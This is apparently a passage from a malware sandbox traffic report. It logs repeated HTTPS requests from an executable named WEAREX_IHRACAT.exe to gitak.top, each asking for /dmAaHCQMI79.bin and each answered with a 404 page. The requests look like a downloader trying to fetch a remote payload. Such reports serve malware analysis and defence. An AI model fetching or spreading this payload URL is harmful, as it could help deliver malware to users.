                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qBfD0KFqKH%2FjuEPqXLGmfVRvGlYJ7xonfYKsjAuioIk3mZ0nD9XfU%2BsdBUtdQhBZsKK5pD6i%2FUtbiuoTH6VFzUzLjhCbEFyDCq93DypeKvLBwuv6cw7Or8rps0k%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babef268d5d2d0e-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        13 | 192.168.11.20 | 49789 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:42:34 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:42:35 UTC | 684 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:42:34 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 136
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qXfiXuYJ4hadXmEM7sONEP2m4MQat6SkERSgInyk3olB8%2FyTCkHB9wvTJz%2BgVW0ZWgn4wzpHY%2FvjdL3Nm%2Fo0G%2Fw%2BeVKfHB1ZsNgSW49r3D78mp37yvegGleUReY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babef686b810737-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        14 | 192.168.11.20 | 49790 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:42:45 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:42:45 UTC | 678 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:42:45 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 147
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sKbW1Y4HPTxcwBPBIxIFuOUjsGbsPaM6IiXAd0gCMmTFMP9875X41jv%2FHIB2pY3JVz7Pai9QieunjV56GiHCRUmj5a0Az4aB3jgFZq%2BDhZf%2B8td4V0P0WY4tXPY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babefaa5a9a81b7-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        15 | 192.168.11.20 | 49791 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:42:55 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:42:56 UTC | 682 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:42:56 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 158
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ACR1CIV4FDjAhd2ezzKBo%2B%2BmCDuOxvybSxgwkG%2BbAd5HU8pi0XXVuQciCGeO3g2yq6%2BYdcmvE1zckugScTv%2Bv9j6Z6OLnGK86IWyAqmiaNLNoz6qlN7YsvRc8vA%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babefec688805f3-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        16 | 192.168.11.20 | 49792 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:43:06 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:43:06 UTC | 678 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:43:06 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 168
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U7Th%2F8Vb4dHHXArb7cx59BBVc87nvJf%2FkctRSGb54018w3bD7fVg3zI5%2Fec8AKupGUwgCcLMuJ0n9cCjXQASLw1zbGqJkvhSaaPE8zL3nDYgQoyt6XKX7OcSQdM%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf02e69c8172f-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        17 | 192.168.11.20 | 49793 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:43:16 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:43:17 UTC | 682 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:43:17 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 179
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dbk%2FKlA5H5JLhG8PPhB65XbwQbdmh%2BQuyX7czVbll9LXT2Gn6wLrXAg2J01sP%2BrLITcKC2G80RJdaTG2N3GJ00IoPwRLkpY2uN0YM7%2Bs37rw0vlUL%2BiDrvlu77o%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf0706a5c05ce-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        18 | 192.168.11.20 | 49794 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:43:27 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:43:28 UTC | 674 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:43:27 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: EXPIRED
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Od4qaBQE%2FtUECG2uHXncFSGFpGy%2BElvcGv%2F4Zuev9uqQg3CYtB0J5RH5UGOt1uAq3oNKrZGFbXkZC5ZN8paB1%2F2pdPTk02kUIZNS3jKtbuNJRKQgd08JUWCvWLc%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf0b24fe40609-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        19 | 192.168.11.20 | 49795 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:43:38 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:43:38 UTC | 683 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:43:38 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 11
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=woX15csC0YOdsa1t8EAgxqkSaWKCCfkIOd%2Bw7Tlq0AZCVdXVwSZi9akJ%2FX4%2Fz%2FDXfb2Z8hEgZN1RbvaspsX9mjx7%2B5K8T45kDCrg9oMv%2BNEBzj31wMu03OoMeCU%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf0f58f11c97c-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        20 | 192.168.11.20 | 49796 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:43:48 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:43:49 UTC | 675 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:43:48 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 21
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4jLzCJsXLh%2FbWWp8BjVWVvbN3PyjdVuDU6cM5nc8f7Z%2Bx3yGVBy1YNlbzREWZFtOZoFTWPylOsvMeUFnOmg90cQlbqRlz5twBb0gZcQF0EnzDJeFM8C7NTFqGUo%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf1371bc759ce-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        21 | 192.168.11.20 | 49797 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:43:59 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:43:59 UTC | 679 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:43:59 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 32
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=66FqERb112nzweANwbLdsasmMz7%2FDYqGhx8TV%2BInDLuRcE3Xe9%2Fo0CcLb1X7S4Ag3zmA6d8YHlL7KsnZVtsScPJoowdkcYp3L01kOBtHiO2kCiw%2Bl5qVENt0YzA%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf17898bac9bc-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        22 | 192.168.11.20 | 49798 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:44:09 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:44:10 UTC | 683 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:44:10 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 43
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EAyowupOWb5VXJ8gC4tntqPW5lHx8Wi31AqO8BiSuyacK%2BvW%2Bj8bdTSJccpv2AWsWdcPSFfIJC7JQrZwlmmGQw%2FXHYGg793%2F%2BJA0Oo8Nv7kyTTDfZi4IsfhJB%2F4%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf1ba687f1ffa-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        23 | 192.168.11.20 | 49799 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:44:20 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:44:20 UTC | 671 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:44:20 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 53
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUQZXjbzj6ju5s79yPBAjZRr5ZbQySffRYXyCiog5C98MrYxjtX4dfqOvzHoEREzjEpqkWEcgtlnPMoUI77jkK34azHbAEx6NuWJoGWLZ0hVfIDXRrbRWywH9Fw%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf1fc3cdb8292-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:44:20 UTC | 698 | IN | Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:44:20 UTC | 1369 | IN | Data Ascii: rgin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:44:20 UTC | 905 | IN | Data Ascii: 5 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 1
                        2024-08-29 10:44:20 UTC | 6 | IN | Data Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:44:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        24 | 192.168.11.20 | 49800 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:44:30 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:44:31 UTC | 685 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:44:31 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 64
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jz7VFTiPKQF%2BrRLpb7vN69gK1%2BcUzeYu3BFQsHzO%2FmQB7Hoyaz7PP2PEJ91Iqz4OhWro%2BvS41XUpNsShp%2FwWXGND%2BNVq9DVAV5IhPeLjK9dkC%2FnuyGJawWmzKiU%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf23dfbae9c19-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:44:31 UTC | 684 | IN | Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:44:31 UTC | 1369 | IN | Data Ascii: : 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fa
                        2024-08-29 10:44:31 UTC | 920 | IN | Data Ascii: 86-2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 1
                        2024-08-29 10:44:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        25 | 192.168.11.20 | 49801 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:44:41 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:44:41 UTC | 681 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:44:41 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 74
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dSvQgm36B3CQEVixDq3DLwJqqF5XXqvULb76%2FrqY6JwvfSAYG14bICP2RkC3%2BlivDeQ11NRp0ElYQUdvNinDT9QqQ0DxTADa9IU3zT%2B7VYeAVDpivDoFpGi%2Fe%2BU%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf27f88a9c942-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:44:41 UTC | 688 | IN | Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:44:41 UTC | 1369 | IN | Data Ascii: px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn
                        2024-08-29 10:44:41 UTC | 915 | IN | Data Ascii: .353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56
                        2024-08-29 10:44:41 UTC | 6 | IN | Data Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:44:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        26 | 192.168.11.20 | 49802 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:44:51 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:44:52 UTC | 683 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:44:52 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 85
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uvGrHFVh6PWFBvVSHPcReQAvG0Omr3d9apds8VsHZOTN8ioHKp0%2BhLP54nunsGj%2B29ujAyCl%2BpO8%2B20tzttoyvcV28n1%2BxKZ%2FhluUogbCGQ1Xa1zUUIn0U1DaPU%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf2c13d4281db-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:44:52 UTC | 686 | IN | Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:44:52 UTC | 1369 | IN | Data Ascii: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fade
                        2024-08-29 10:44:52 UTC | 918 | IN | Data Ascii: -2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h
                        2024-08-29 10:44:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        27 | 192.168.11.20 | 49803 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:45:02 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:45:02 UTC | 677 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:45:02 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 95
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q5RykvhTjptvCpjS4wBPMhx7sp3%2BIMVVbgt%2BdCZ5ZDBHAQzsmV1mWm%2BfHQUYsE69qHvhdqIMvGmqLPrN6Q39SMHAX1j5kFlAsGbT4Yj4ZUDtLM2umg8S3KmvoWY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf3030f68c591-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:45:02 UTC | 692 | IN | Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:45:02 UTC | 1369 | IN | Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:45:02 UTC | 912 | IN | Data Ascii: 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.6
                        2024-08-29 10:45:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        28 | 192.168.11.20 | 49804 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:45:12 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:45:13 UTC | 678 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:45:13 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 106
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dHBvQLdSwBm9PoKkTUtljEORft8B1GglMqqEBglJjTMkatKnSdWb64zw2yRX6qFMQNH%2F8TYsc7qAPz%2F7OuPcjsXgLOia82dKizi9rdTMsjTqUo9Vd4N94%2FBzd5k%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
